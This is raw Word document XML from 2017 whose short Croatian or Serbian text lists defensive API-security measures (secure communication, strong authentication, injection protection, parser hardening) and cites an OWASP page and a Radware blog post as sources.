    <w:p w:rsidR="00AD5B21" w:rsidRDefault="00AD5B21" w:rsidP="00AD5B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Napravimo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sigurnu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komunikaciju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između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klijenta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našeg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AD5B21" w:rsidRDefault="00AD5B21" w:rsidP="00AD5B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Osiguramo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jaku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dobru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autentifikaciju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AD5B21" w:rsidRDefault="00485DE5" w:rsidP="00AD5B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Zaštitimo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injction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485DE5" w:rsidRDefault="00485DE5" w:rsidP="00AD5B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Parser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ojačamo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napravimo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otpornijim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napade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485DE5" w:rsidRDefault="00485DE5" w:rsidP="00485DE5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Izvori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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00485DE5" w:rsidRDefault="00485DE5" w:rsidP="00485DE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/Top_10_2017-A10-Underprotected_APIs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00485DE5" w:rsidRPr="00485DE5" w:rsidRDefault="00485DE5" w:rsidP="00485DE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang/>
        </w:rPr>
        <w:t>https://blog.radware.com/security/2017/04/no-api-security/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230875" w:rsidRPr="008A5673" w:rsidRDefault="00230875" w:rsidP="008A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230875" w:rsidRPr="008A5673" w:rsidSect="0049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2345"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EF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34BB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1056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26E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3AC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A278C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A490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80E4E"/>
    <w:rsid w:val="00230875"/>
    <w:rsid w:val="002A772D"/>
    <w:rsid w:val="00450AFB"/>
    <w:rsid w:val="00463C9E"/>
    <w:rsid w:val="00485DE5"/>
    <w:rsid w:val="0049289D"/>
    <w:rsid w:val="005C1D1F"/>
    <w:rsid w:val="0060213B"/>
    <w:rsid w:val="00636123"/>
    <w:rsid w:val="006F3380"/>
    <w:rsid w:val="00743BAD"/>
    <w:rsid w:val="008155A1"/>
    <w:rsid w:val="008A5673"/>
    <w:rsid w:val="008F1059"/>
    <w:rsid w:val="009A4509"/>
    <w:rsid w:val="009E4CD9"/>
    <w:rsid w:val="00A834D3"/>
    <w:rsid w:val="00AD5B21"/>
    <w:rsid w:val="00B83C64"/>
    <w:rsid w:val="00BB02E5"/>
    <w:rsid w:val="00C461F3"/>
    <w:rsid w:val="00CA4554"/>
    <w:rsid w:val="00CE260D"/>
    <w:rsid w:val="00E66C9A"/>
    <w:rsid w:val="00E75C4E"/>
    <w:rsid w:val="00E80E4E"/>
    <w:rsid w:val="00F9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9D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B83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80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E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hread-subject">
    <w:name w:val="thread-subject"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E80E4E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B83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5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517">
          <w:marLeft w:val="300"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:left w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:bottom w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:right w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="856236167">
          <w:marLeft w:val="300"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:left w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:bottom w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:right w:val="dashed" w:sz="12" w:space="3" w:color="44444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F59B-4C9E-4924-9A6D-A6811C83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7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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-17T21:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-19T10:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>